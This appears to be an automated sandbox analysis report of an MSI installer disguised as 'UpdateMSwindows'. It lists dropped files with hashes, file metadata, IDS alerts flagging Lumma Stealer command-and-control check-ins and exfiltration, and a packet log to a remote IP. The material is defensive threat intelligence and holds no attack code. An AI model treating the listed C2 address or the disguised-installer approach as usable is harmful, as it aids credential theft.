Preview:	...@IXOS.@.....@...X.@.....@.....@.....@.....@.....@......&.{F7154933-FAB7-4F13-A08C-0291DB5E5D05}..UpdateMSwindows..NB4EASbynx.msi.@.....@.....@.....@........&.{94DF14AB-36C1-4886-A54A-687987508C4D}.....@.....@.....@.....@.......@.....@.....@.......@......UpdateMSwindows......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{EF0CC9F4-2421-4C1C-B08A-029700B2B11C}7.C:\Program Files (x86)\UpdateMSwindows\UpdateMSwindows\.@.......@.....@.....@......&.{E7DD4B25-BE79-4B50-9770-B4FE0693249A}4.02:\Software\UpdateMSwindows\UpdateMSwindows\Version.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".7.C:\Program Files (x86)\UpdateMSwindows\UpdateMSwindows\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]...@.....@.....@.3..$..@....(.Software\UpdateMSwindows\UpdateMSwindows...@....%...Version..1.0.0%...P

C:\Windows\Installer\SourceHash{F7154933-FAB7-4F13-A08C-0291DB5E5D05}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1636391916723232
Encrypted:	false
SSDEEP:	12:JSbX72Fj//iAGiLIlHVRpZh/7777777777777777777777777vDHFwLLRx1Dit/z:Jx6QI5tmLj8iF
MD5:	14C73D8F3C3D982FF14771FA722E644E
SHA1:	A6B879AD142E364E2279B3D3D3D7C2B989C1D7FF
SHA-256:	FFA556401AE04C4A95243534A57DAE58E788384DE74A26CAA9D245979336443F
SHA-512:	889403270AC8077B87730BA672926B6F7F323A87EB5D3EAABD2914437CC9F3CA336DAC0053E30775D68E27033E86CE4D51860DF0EFAAE9913888A36D64F39E2A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.589035988476092
Encrypted:	false
SSDEEP:	48:N8PhduRc06WXJSjT5XGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:whd1JjT512i6k2iKeRCIb2i6k2iZ
MD5:	F60B4F7B83B2F4507BB654331EBEFD8E
SHA1:	EE73209239BA6C0535B54591C17E3E230E97B86C
SHA-256:	7A98F6D4875DDD2F094ABF40654E212DD07EAE82A0327E06BD621E12FB1AF47D
SHA-512:	823DAA7A84EE2DF8E121E70DFACC51ED7F61B47575499AF5BA553B6B134CDD53D587E0B549A28D17D22D64F884E4A33BABADB3BA8321E92C08509742698008BC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	360001
Entropy (8bit):	5.362993660459459
Encrypted:	false
SSDEEP:	1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauj:zTtbmkExhMJCIpEq
MD5:	BEB5FCA3F4AEF90EA6C2EC97AACDDD37
SHA1:	50E0400D6AA2A8CB2693B802E16FD971E48E25FB
SHA-256:	B3CB8D08DB4EBDEEFC4EFE5051D4C5B3A01D5A26FF9396D4D26CE1C99208D71D
SHA-512:	7AD575BE50FD5810AED71366BBC2C97A4BD72EC19DE9B79C61355EFEA91DACC6AF91CBC025FADF7FDEB46A0D2FD1496C2E768A8C470AEE876DF82CA02C9A6BF9
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

C:\Windows\Temp\~DF0134FB345E482C7A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.07157075893903267
Encrypted:	false
SSDEEP:	6:2/9LG7iVCnLG7iVrKOzPLHKOwLbY4Rx1BkgVky6lit/:2F0i8n0itFzDHFwLLRx1Qit/
MD5:	C8F48A459D6F7B052C042EB168B6CFD6
SHA1:	DA6154A79927F68BE22EA4D2224EBB1D94903C56
SHA-256:	1374B9ACAE8C4F046E88EC95ED64D5CC448389048AC372F912735E2F2C2820B4
SHA-512:	240B6BFA8EB1C70134253C01916595AC67CE8F6F8822A7A78F6DEC5C4056F7CD355160212B67C42A3720C9EC113CEE15F7E021A536FCCD1D68A74608E041DA70
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF23FAA980D14CD732.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.270880513857938
Encrypted:	false
SSDEEP:	48:H0lusI+CFXJFT5VBGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:UlgdTjB12i6k2iKeRCIb2i6k2iZ
MD5:	C2089B017D8433A197038E986C820DB8
SHA1:	4A7C92F3260C0E4976AF6A2701627CD8D5E83AD8
SHA-256:	B6699ED1C2A3D467331B71A1CDEF09EA3197EF2D0E814CB588F7327D9AF1C836
SHA-512:	D69E7F0F1AE04F7CD3FE784A8E02F93BF6631373E0FEA90AFD132C6C032143F0D9CC68405EA2DBF00DBF9526DE163B47F7375A5062F811F585DFECB2C66CD863
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF2A7C783D5DE4B7FD.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.270880513857938
Encrypted:	false
SSDEEP:	48:H0lusI+CFXJFT5VBGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:UlgdTjB12i6k2iKeRCIb2i6k2iZ
MD5:	C2089B017D8433A197038E986C820DB8
SHA1:	4A7C92F3260C0E4976AF6A2701627CD8D5E83AD8
SHA-256:	B6699ED1C2A3D467331B71A1CDEF09EA3197EF2D0E814CB588F7327D9AF1C836
SHA-512:	D69E7F0F1AE04F7CD3FE784A8E02F93BF6631373E0FEA90AFD132C6C032143F0D9CC68405EA2DBF00DBF9526DE163B47F7375A5062F811F585DFECB2C66CD863
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3FECA6A770E2A6D3.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF60147ABB188BCB9C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF79247D6107B4D357.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.589035988476092
Encrypted:	false
SSDEEP:	48:N8PhduRc06WXJSjT5XGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:whd1JjT512i6k2iKeRCIb2i6k2iZ
MD5:	F60B4F7B83B2F4507BB654331EBEFD8E
SHA1:	EE73209239BA6C0535B54591C17E3E230E97B86C
SHA-256:	7A98F6D4875DDD2F094ABF40654E212DD07EAE82A0327E06BD621E12FB1AF47D
SHA-512:	823DAA7A84EE2DF8E121E70DFACC51ED7F61B47575499AF5BA553B6B134CDD53D587E0B549A28D17D22D64F884E4A33BABADB3BA8321E92C08509742698008BC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8ACC052D60164BF1.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFA44E230E9286797A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.270880513857938
Encrypted:	false
SSDEEP:	48:H0lusI+CFXJFT5VBGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:UlgdTjB12i6k2iKeRCIb2i6k2iZ
MD5:	C2089B017D8433A197038E986C820DB8
SHA1:	4A7C92F3260C0E4976AF6A2701627CD8D5E83AD8
SHA-256:	B6699ED1C2A3D467331B71A1CDEF09EA3197EF2D0E814CB588F7327D9AF1C836
SHA-512:	D69E7F0F1AE04F7CD3FE784A8E02F93BF6631373E0FEA90AFD132C6C032143F0D9CC68405EA2DBF00DBF9526DE163B47F7375A5062F811F585DFECB2C66CD863
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFAC706A84CEB26BA8.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC9703DE7EF69207B.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.1459225699709233
Encrypted:	false
SSDEEP:	48:+SuT4dG2i6SkdG2i7dG2i6SkdG2iKVAEkrCyd73oN:bW2i6k2ig2i6k2iKeRCIU
MD5:	B43E3ED06B0BE373EB0A3236E221FDF4
SHA1:	21B04FE686E943BA7B465C5A6DD2770DD9CCDE13
SHA-256:	42CBB26F70FA361A73F3B1B5B343405F24DBCD59E812001150B939DA53A85F54
SHA-512:	5970BD5466D63667F9F8CC75848E0240FC245BAD0F0E051B8A4446B063267EDAA6CD15F49AE5D38B8293529FB6F7A8FCDD038D860DD147ECDF1E7A4C360DE35B
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE14BFCAB93EAE800.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.589035988476092
Encrypted:	false
SSDEEP:	48:N8PhduRc06WXJSjT5XGdG2i6SkdG2iKVAEkrCyd73oxdG2i6SkdG2iWTkk:whd1JjT512i6k2iKeRCIb2i6k2iZ
MD5:	F60B4F7B83B2F4507BB654331EBEFD8E
SHA1:	EE73209239BA6C0535B54591C17E3E230E97B86C
SHA-256:	7A98F6D4875DDD2F094ABF40654E212DD07EAE82A0327E06BD621E12FB1AF47D
SHA-512:	823DAA7A84EE2DF8E121E70DFACC51ED7F61B47575499AF5BA553B6B134CDD53D587E0B549A28D17D22D64F884E4A33BABADB3BA8321E92C08509742698008BC
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFE70856C2C128635C.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {94DF14AB-36C1-4886-A54A-687987508C4D}, Number of Words: 2, Subject: UpdateMSwindows, Author: UpdateMSwindows, Name of Creating Application: UpdateMSwindows, Template: ;1033, Comments: This installer database contains the logic and data required to install UpdateMSwindows., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jul 23 16:58:05 2024, Last Saved Time/Date: Tue Jul 23 16:58:05 2024, Last Printed: Tue Jul 23 16:58:05 2024, Number of Pages: 450
Entropy (8bit):	7.3463477510001045
TrID:	Windows SDK Setup Transform Script (63028/2) 47.91% Microsoft Windows Installer (60509/1) 46.00% Generic OLE2 / Multistream Compound File (8008/1) 6.09%
File name:	NB4EASbynx.msi
File size:	2'580'992 bytes
MD5:	3b48c90d4a283982ced898df9570894b
SHA1:	ed07663c40d54fff42af99c2969971a3493f1bf7
SHA256:	3ed535bbcd9d4980ec8bc60cd64804e9c9617b7d88723d3b05e6ad35821c3fe7
SHA512:	42171b68a91d1d99ca127fc3af875ac0ec961b85335d9bb809788cfe5951460fdc46d2a7df2b1cea54cf67e7631fcff82d7d158104266450f8e1989786d284b0
SSDEEP:	49152:6spIfhlTYEO+w2/64hnPRMB0WkuqES58NtvU:dIZlEN+wK6qRMB0WkufF
TLSH:	FCC5CF22B5D7C522D22F0377F929FE1A593D3E223B6345EB76E4395D2830CC16276A12
File Content Preview:	........................>...................(...................................g.......@.......................................................................................z...{...\|...}...~..............................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T09:54:05.626887+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49722	443	192.168.2.6	188.114.96.3
2024-07-25T09:54:09.471784+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49725	443	192.168.2.6	188.114.96.3
2024-07-25T09:54:07.393267+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49723	443	192.168.2.6	188.114.96.3
2024-07-25T09:54:08.625645+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	49724	443	192.168.2.6	188.114.96.3
2024-07-25T09:54:13.980250+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49728	443	192.168.2.6	188.114.96.3
2024-07-25T09:54:06.322611+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49722	443	192.168.2.6	188.114.96.3
2024-07-25T09:54:08.313743+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49724	443	192.168.2.6	188.114.96.3
2024-07-25T09:53:23.686115+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49718	20.114.59.183	192.168.2.6
2024-07-25T09:54:06.823663+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49723	443	192.168.2.6	188.114.96.3
2024-07-25T09:54:17.088274+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49729	443	192.168.2.6	188.114.96.3
2024-07-25T09:54:10.700182+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49726	443	192.168.2.6	188.114.96.3
2024-07-25T09:54:18.413471+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49729	443	192.168.2.6	188.114.96.3
2024-07-25T09:52:45.853828+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49712	20.114.59.183	192.168.2.6
2024-07-25T09:54:12.517765+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49727	443	192.168.2.6	188.114.96.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 09:54:05.145489931 CEST	49722	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:05.145530939 CEST	443	49722	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:05.145720005 CEST	49722	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:05.149346113 CEST	49722	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:05.149358988 CEST	443	49722	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:05.626807928 CEST	443	49722	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:05.626887083 CEST	49722	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:05.628542900 CEST	49722	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:05.628552914 CEST	443	49722	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:05.628854990 CEST	443	49722	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:05.669594049 CEST	49722	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:05.689519882 CEST	49722	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:05.689519882 CEST	49722	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:05.689685106 CEST	443	49722	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:06.322691917 CEST	443	49722	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:06.322963953 CEST	443	49722	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:06.323229074 CEST	49722	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:06.341581106 CEST	49722	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:06.341655016 CEST	443	49722	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:06.349873066 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:06.349945068 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:06.350028038 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:06.350346088 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:06.350363970 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:06.823503017 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:06.823662996 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:06.825062990 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:06.825073004 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:06.825364113 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:06.826787949 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:06.826809883 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:06.826867104 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.393302917 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.393385887 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.393486977 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.393517971 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.394984961 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.396840096 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.396889925 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.396908998 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.397739887 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.398745060 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.400722027 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.400768042 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.400790930 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.400799990 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.402560949 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.402641058 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.450768948 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.450797081 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.489228964 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.489367008 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.489504099 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.489684105 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.489705086 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.489718914 CEST	49723	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.489726067 CEST	443	49723	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.679110050 CEST	49724	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.679157972 CEST	443	49724	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:07.679263115 CEST	49724	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.679655075 CEST	49724	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:07.679662943 CEST	443	49724	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:08.313538074 CEST	443	49724	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:08.313743114 CEST	49724	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:08.315043926 CEST	49724	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:08.315054893 CEST	443	49724	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:08.315315008 CEST	443	49724	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:08.316690922 CEST	49724	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:08.316802979 CEST	49724	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:08.316832066 CEST	443	49724	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:08.625664949 CEST	443	49724	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:08.625768900 CEST	443	49724	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:08.626327991 CEST	49724	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:08.626327991 CEST	49724	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:08.935101032 CEST	49724	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:08.935156107 CEST	443	49724	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:08.992230892 CEST	49725	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:08.992275953 CEST	443	49725	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:08.992355108 CEST	49725	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:08.992676020 CEST	49725	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:08.992690086 CEST	443	49725	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:09.471635103 CEST	443	49725	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:09.471784115 CEST	49725	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:09.473318100 CEST	49725	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:09.473336935 CEST	443	49725	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:09.473712921 CEST	443	49725	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:09.474886894 CEST	49725	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:09.475025892 CEST	49725	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:09.475069046 CEST	443	49725	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:09.475131035 CEST	49725	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:09.475138903 CEST	443	49725	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:09.930449963 CEST	443	49725	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:09.930556059 CEST	443	49725	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:09.930612087 CEST	49725	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:09.930712938 CEST	49725	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:09.930737019 CEST	443	49725	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:10.209610939 CEST	49726	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:10.209662914 CEST	443	49726	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:10.209728956 CEST	49726	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:10.210153103 CEST	49726	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:10.210165977 CEST	443	49726	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:10.699995041 CEST	443	49726	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:10.700181961 CEST	49726	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:10.701527119 CEST	49726	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:10.701536894 CEST	443	49726	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:10.702126026 CEST	443	49726	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:10.703411102 CEST	49726	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:10.703411102 CEST	49726	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:10.703455925 CEST	443	49726	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:10.703511953 CEST	49726	443	192.168.2.6	188.114.96.3
Jul 25, 2024 09:54:10.703522921 CEST	443	49726	188.114.96.3	192.168.2.6
Jul 25, 2024 09:54:11.556915045 CEST	443	49726	188.114.96.3	192.168.2.6
